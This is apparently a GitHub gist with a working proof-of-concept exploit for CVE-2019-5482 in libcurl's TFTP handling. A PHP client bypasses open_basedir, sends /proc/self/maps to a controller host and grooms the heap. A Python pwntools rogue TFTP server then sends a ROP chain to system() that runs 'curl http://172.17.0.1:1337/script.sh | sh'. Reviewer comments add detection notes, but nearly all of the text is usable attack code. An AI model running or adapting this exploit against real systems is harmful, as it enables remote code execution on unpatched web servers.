@PaulCher PaulCher/_readme.md Secret
Last active Sep 21, 2019

curl 1-day exploit
  1. Confirm that you have an unpatched version of libcurl, one that still contains CVE-2019-5482
  2. Update the IP addresses in the source files
  3. Launch srv.py on the server
  4. Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
// <?php
// NOTE(review): the "//" in front of the opening tag looks like a paste/rendering
// artifact; taken literally the line never enters PHP mode. Left as shown.
//
// Client side (sol.php) of the CVE-2019-5482 proof of concept described above. It
// runs inside the web server's PHP worker. What is directly observable from the
// code, and what a defender gets from it:
//   * open_basedir is widened at runtime by walking up with chdir('..') until
//     ini_set('open_basedir', '/') is accepted -- open_basedir must not be relied
//     on as a security boundary on its own;
//   * /proc/self/maps is read and pushed over a raw outbound TCP socket -- a PHP
//     worker doing either is a strong host-level detection signal (file-access
//     auditing on /proc/self/maps, egress rules for the worker);
//   * libcurl is pointed at a tftp:// URL with a non-default CURLOPT_TFTP_BLKSIZE.
//     The fix is a patched libcurl; independently, restricting CURLOPT_PROTOCOLS
//     to HTTP(S) in application code keeps the TFTP code path out of reach.
error_reporting(-1);
ini_set('display_errors', 'On');
// Scratch directory under /tmp; starting point for the chdir('..') walk below.
chdir("/tmp");
mkdir("/tmp/zzzzz");
chdir("/tmp/zzzzz");
echo getcwd() . "\n";
// ini_set accepts the relative path '..' here; each loop iteration moves one
// level up and retries '/'. (Observed behaviour of the author's PHP build --
// TODO confirm on the version under test.)
if (!ini_set('open_basedir', '..')) {
    echo "failed";
}
while (!ini_set('open_basedir', '/')) {
    chdir('..');
}
echo "open_basedir bypassed\n";
// Leak this process's memory layout to the controller (srv.py) on TCP 12345.
// srv.py derives library load addresses from it, which the rest of the chain
// needs -- without this leak there is no ASLR defeat, so it is the cheapest
// point to detect and block.
$maps = file_get_contents("/proc/self/maps");
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, '172.17.0.1', 12345);
if (socket_send($sock, $maps, strlen($maps), 0) === false) {
    die("failed to send maps");
}
//$o = curl_init();
//curl_setopt($y, CURLOPT_COOKIELIST, "/bin/sh");
// Only $h performs a transfer; the other handles just carry fixed-size cookie
// lists -- presumably heap shaping, so creation order and sizes are left untouched.
$a = curl_init();
$h = curl_init();
$b = curl_init();
$c = curl_init();
$d = curl_init();
$e = curl_init();
$f = curl_init();
$q = curl_init();
$w = curl_init();
$r = curl_init();
$t = curl_init();
$y = curl_init();
curl_setopt($a, CURLOPT_BUFFERSIZE, 0x1234);
curl_setopt($a, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($b, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($c, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($d, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($r, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($e, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($y, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($t, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($w, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
curl_setopt($q, CURLOPT_COOKIELIST, str_repeat("A" , 0x1e0 - 8));
// Trigger: a TFTP transfer to the rogue server (srv.py) with a small block
// size option. An outbound tftp:// request from a web worker is itself anomalous.
$url = "tftp://172.17.0.1:1234";
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_TFTP_BLKSIZE, 0x60 - 4);
echo "doing!\n";
$res = curl_exec($h);
echo "res = $res";
curl_close($h);
#!/usr/bin/env python
"""srv.py -- controller / rogue TFTP server side of the CVE-2019-5482 PoC above.

Depends on pwntools (``pwn``). Written for Python 2 (``print`` statements and
``raw_input`` in ``main``).
"""
from pwn import *
# Global pwntools context: x86-64 Linux; 'debug' makes pwntools log tube traffic.
context(arch='amd64', os='linux', log_level='debug')
def main() -> None:
    """Controller side of the PoC: a rogue TFTP server plus a TCP sink for the leak.

    As written, the flow is:
      1. listen on UDP 1234 (the tftp:// target used by sol.php) and on TCP
         12345 (where sol.php sends /proc/self/maps);
      2. pick the r-x mappings of libsqlite3 and libc-2.27.so out of the maps
         text to recover both libraries' load addresses;
      3. answer the client's TFTP read request with an OACK, then send one
         raw UDP datagram carrying the author's payload.

    Defender notes: the command embedded in the payload is a curl fetch piped
    to sh, so even if the memory corruption succeeds, process-tree monitoring
    (PHP worker spawning sh/curl) and egress filtering for the worker catch
    this stage. The memory-map leak over TCP 12345 is the earlier and cheaper
    point to detect.

    NOTE: Python 2 code (print statements, raw_input, str byte buffers).
    """
    l = listen(1234, typ='udp')
    ll = listen(12345, typ='tcp')
    # Drop to 'warning' while the maps blob arrives (presumably to keep the
    # pwntools debug hexdump quiet), then restore.
    context.log_level = 'warning'
    maps = ll.recvall(timeout=10)
    context.log_level = 'debug'
    # Each maps line is "<start>-<end> <perms> ..."; the start of the r-x
    # mapping is taken as the library's load address. Both names stay unbound
    # if no line matches.
    for line in maps.split('\n'):
        if 'r-x' in line and 'libsqlite3' in line:
            words = line.split('-')
            sqlite_base = int(words[0], 16)
        if 'r-x' in line and 'libc-2.27.so' in line:
            words = line.split('-')
            libc_base = int(words[0], 16)
    # Gadget/symbol offsets relative to those bases, per the author's annotations.
    pivot = sqlite_base + 0x00000000000e4326 # pop; pop; pop; pop; pop rsp; pop ; pop ; ret
    pop_rdi = libc_base + 0x000000000002155f # pop rdi ; ret
    mov_gadget = sqlite_base + 0x000000000004d607 # mov rdi, rdx ; call r8
    pop_r8 = sqlite_base + 0x00000000000147b8 # pop r8 ; ret
    system_addr = libc_base + 324672
    print 'sqlite_base', hex(sqlite_base)
    print 'libc_base', hex(libc_base)
    # TFTP read request from the libcurl client (fixed-size read).
    data = l.recv(0x26)
    # TFTP OACK (opcode 6) carrying one option name/value pair.
    oack = ''
    oack += '\0\x06hhh\0ppppp\0'
    l.send(oack)
    sleep(0.5)
    # Payload datagram: command string, then the ROP chain, padded to 0x200
    # bytes. Layout is exploit-specific and kept exactly as the author wrote it.
    p = ''
    p += 'A' * (296 - 184)
    p += 'curl http://172.17.0.1:1337/script.sh | sh\0'
    p += 'A' * (296 - len(p))
    p += 'B' * 8
    p += p64(pivot)
    p += 'A' * 0x10
    p += p64(pop_r8)
    p += p64(system_addr)
    #p += 'Q' * 8
    p += p64(mov_gadget)
    p += cyclic(392 - len(p), n=8)
    p += p64(0) # this is required to skip hash iteration cycle and jump right to call %%rax
    p += 'A' * (0x200 - len(p))
    #p = cyclic(0x200, n=8)
    #p = p.replace(p64(0x6261616161616179), p64(0))
    # Operator pause before the payload goes out.
    raw_input()
    l.send(p)
    sleep(1)
    l.close()
if __name__ == '__main__':
    # Run only when executed directly (the context() call above still runs on import).
    main()